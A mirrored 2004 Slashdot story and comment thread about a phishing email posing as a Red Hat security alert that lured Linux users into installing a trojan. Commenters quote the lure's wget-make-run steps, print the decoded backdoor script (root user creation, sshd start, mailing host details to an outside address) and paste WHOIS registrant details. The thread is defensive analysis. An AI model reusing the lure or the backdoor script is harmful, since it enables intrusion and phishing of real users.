Slashdot Mirror

← Back to Stories (view on slashdot.org)

Beware 'Fedora-Redhat' Fake Security Alert

Posted by timothy on from the don't-get-took dept.

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

18 of 628 comments (clear)

  1. text of site by Anonymous Coward · · Score: 5, Informative

    Original issue date: October 20, 2004
    Last revised: October 20, 2004
    Source: RedHat

    A complete revision history is at the end of this file.

    Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

    The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

    * First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
    * Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
    * cd fileutils-1.0.6.patch
    * make
    * ./inst

    Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

    Thank you for your prompt attention to this serious matter,

    RedHat Security Team.

    Copyright © 2004 Red Hat, Inc. All rights reserved.

    1. Re:text of site by Seehund · · Score: 5, Informative
      Actually, the exploit indeed seems to use RPM. The archive includes a .bin file, which in reality is an RPM.
      drwxr-xr-x root/wheel 0 2004-10-23 21:09:09 fileutils-1.0.6.patch/
      -rw-r--r-- root/wheel 32 2004-10-23 02:59:42 fileutils-1.0.6.patch/Makefile
      -rw-r--r-- root/wheel 14297 2004-10-23 18:02:12 fileutils-1.0.6.patch/inst.c
      -rw-r--r-- root/wheel 990084 2004-10-23 21:06:48 fileutils-1.0.6.patch/fileutils-patch.bin
      But I see what you mean.

      Also, a simple thing such as that this time you're not recommended to simply start up2date or yum to get updates as usual really should set off some alarms in people's minds. And that fedora-redhat.com is not and has never been used by Fedora or Red Hat. And so on.

      I doubt that many fell for this.

      --
      Help savingAmigaOS and a free PowerPC market
    2. Re:text of site by WindBourne · · Score: 5, Informative
      It is a little root kit.
      /bin/chgrp
      /bin/chmod
      /bin/chown
      /bin/cp
      /bin/ dd
      /bin/df
      /bin/link
      /bin/ln
      /bin/ls
      /bin/mkd ir
      /bin/mknod
      /bin/mv
      /bin/rm
      /bin/rmdir
      /bin /sync
      /bin/touch
      /bin/unlink
      /etc/DIR_COLORS
      / etc/DIR_COLORS.xterm
      /etc/profile.d
      /etc/profile .d/colorls.csh
      /etc/profile.d/colorls.sh
      /usr/bi n/dir
      /usr/bin/dircolors
      /usr/bin/du
      /usr/bin/i nstall
      /usr/bin/mkfifo
      /usr/bin/shred
      /usr/bin/ vdir
      ...
      And there is more, but hey....
      --
      I prefer the "u" in honour as it seems to be missing these days.
  2. Here's what WHOIS says: by SIGBUS · · Score: 5, Informative

    [Querying whois.internic.net]
    [Redirected to whois.melbourneit.com]
    [Querying whois.melbourneit.com]
    [whois.melbourneit.com]

    Domain Name.......... fedora-redhat.com
    Creation Date........ 2004-10-24
    Registration Date.... 2004-10-24
    Expiry Date.......... 2005-10-24
    Organisation Name.... Raymond Jackson
    Organisation Address. 224 Cedar Avenue
    Organisation Address.
    Organisation Address. New York
    Organisation Address. 95301
    Organisation Address. NY
    Organisation Address. UNITED STATES

    Admin Name........... Raymond Jackson
    Admin Address........ 224 Cedar Avenue
    Admin Address........
    Admin Address........ New York
    Admin Address........ 95301
    Admin Address........ NY
    Admin Address........ UNITED STATES
    Admin Email.......... rayjackson23@yahoo.com
    Admin Phone.......... +1.2098994533
    Admin Fax............

    Tech Name............ YahooDomains TechContact
    Tech Address......... 701 First Ave.
    Tech Address.........
    Tech Address......... Sunnyvale
    Tech Address......... 94089
    Tech Address......... CA
    Tech Address......... UNITED STATES
    Tech Email........... domain.tech@YAHOO-INC.COM
    Tech Phone........... +1.6198813096
    Tech Fax............. +1.6198813010
    Name Server.......... yns1.yahoo.com
    Name Server.......... yns2.yahoo.com

    --
    Oh, no! You have walked into the slavering fangs of a lurking grue!
  3. Re:I'll try it... by damiam · · Score: 5, Informative

    Make sure you use a chroot jail; Knoppix can still write to your hard drive.

    --
    It's hard to be religious when certain people are never incinerated by bolts of lightning.
  4. Re:I'll try it... by busonerd · · Score: 4, Informative

    [apologies for replying to myself]

    The makefile compiles an application called inst that seems to have been created with the shc script compiler.. its rather obfuscated.. attempting to reverse engineer now

  5. Re: I'll try it... Execution results! by enginuitor · · Score: 5, Informative

    Identifying the system. This may take up to 2 minutes. Please wait...
    adduser: No more than two names.
    passwd: Unknown user bash
    Could not load host key: /etc/ssh/ssh_host_key
    Could not load host key: /etc/ssh/ssh_host_rsa_key
    Could not load host key: /etc/ssh/ssh_host_dsa_key
    Disabling protocol version 1. Could not load host key.
    Disabling protocol version 2. Could not load host key.
    sshd: no hostkeys available -- exiting.
    System looks OK. Proceeding to next step.

    Patching "ls": ###########
    Patching "mkdir": ##########

    System updated and secured successfully. You may erase these files.

  6. Re:I'll try it... by eakerin · · Score: 4, Informative
    Well I downloaded it, and uncompressed it.

    There are 3 files:
    fileutils-patch.bin
    inst.c
    Makefile

    fileutils-patch.bin is an rpm with an incorrect extension, but it's valid. And an actual RPM from redhat (verified the GPG signature) Probably just put there to make it look bigger, and have something that came from redhat.

    Well I was gonna put the package header information here, but slashcode didn't like it.

    Signature verification using "rpm --checksig fileutils-patch.bin"
    fileutils-patch.bin: (sha1) dsa sha1 md5 gpg OK
  7. Use SPF to protect yourself from phishing by taubz · · Score: 5, Informative

    If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.

    How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension.

    (Disclosure: I wrote the plugin. :) )

  8. Re: I'll try it... Execution results! by enginuitor · · Score: 5, Informative

    It would appear that the author of this code was a bit foolish. The code appears to try to add a user, then start an sshd backdoor, all during the time that it's supposedly "Identifying the system". But it fails and spits out a bunch of errors! I will post the code shortly.

  9. Re:I'll try it... by superpeach · · Score: 5, Informative

    I just looked at inst.c and changed it a bit to print what it runs instead of running it. Looks like a shell script hidden in some C (using shc, http://www.datsi.fi.upm.es/~frosal/sources/shc.htm l )

    The working bit of the script is:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    So, adds a user called bash with root privs, starts sshd and emails your IP address to someone.

  10. Contents of inst.c... by enginuitor · · Score: 5, Informative

    I've tried to post the code here, but am repeatedly blocked by the Lameness Filter. I have posted the C file to my server. It's safe to view, as long as you don't go trying to compile and run it! :-p
    View inst.c

  11. Re: I'll try it... Execution results! by Smitedogg · · Score: 5, Informative

    Here is what it does.

    Dogg

  12. I'm retarded by Cid+Highwind · · Score: 4, Informative

    Looks like I misinterpreted the code. The rc4 stuff is part of the shc "script compiler" output that decodes the actual shell script. fileutils-patch.bin is just a mis-named redhat RPM that inst doesn't appear to use at all.

    --
    0 1 - just my two bits
    1. Re:I'm retarded by busonerd · · Score: 5, Informative

      Preliminary analysis of inst.c: Decrypts a whole bunch of stuff (not sure where it all goes yet) and then splits off to /bin/sh with a command line of: /bin/sh -c exec './inst' "$@" ./inst

  13. Re: I'll try it... Execution results! by MbM · · Score: 5, Informative

    The script is encoded into the text variable in the source. The key part of the script is this:

    echo "Inca un root frate belea: " >> /tmp/mama
    adduser -g 0 -u 0 -o bash >> /tmp/mama
    passwd -d bash >> /tmp/mama
    ifconfig >> /tmp/mama
    uname -a >> /tmp/mama
    uptime >> /tmp/mama
    sshd >> /tmp/mama
    echo "user bash stii tu" >> /tmp/mama
    cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
    rm -rf /tmp/mama

    (I'd post the whole script but the lameness filter won't let me)

    Create a user named bash, no password
    grab the ip and uptime, start ssh
    mail the results

    --
    - MbM
  14. contact yahoo by Anonymous Coward · · Score: 4, Informative

    Everyone should email yahoo via netblockadmin@yahoo-inc.com and ask them to take the site down.

  15. Re:I'll try it... by aredubya74 · · Score: 4, Informative

    Assuming (yeah, I know, big assumption) the whois info is relatively accurate, we may have an idea as to at least next step in the chain of figuring out the culprit, output of whois addlebrain.com:

    Registration Service Provided By: StoreIQ, Inc.
    Contact: technical@storeiq.com
    Visit:

    Domain name: addlebrain.com

    Registrant Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Administrative Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Technical Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Billing Contact:
    ABM Wireless
    Domain Administrator (administrator@buywirelessdirect.com)
    +1.7323331100
    Fax: +1.NA
    3587 US Highway 9 #132
    Freehold, NJ 07728
    US

    Status: Locked

    Name Servers:
    dns1.name-services.com
    dns2.name-services.com
    dns3.name-services.com
    dns4.name-services.com
    dns5.name-services.com

    The same address is used for two associated domains, buywirelessdirect.com (the email addy for this domain's tech contact) and storeiq.com (the email addy for buywirelessdirect.com's tech contact). The area code is accurate for that neck of the woods too, though I haven't tried the phone number (yet):

    StoreIQ, Inc.
    John Thompson (technical@storeiq.com)
    +1.7323331145
    Fax:
    3587 US Highway 9 #213
    Freehold, NJ 07728
    US

    --

    RW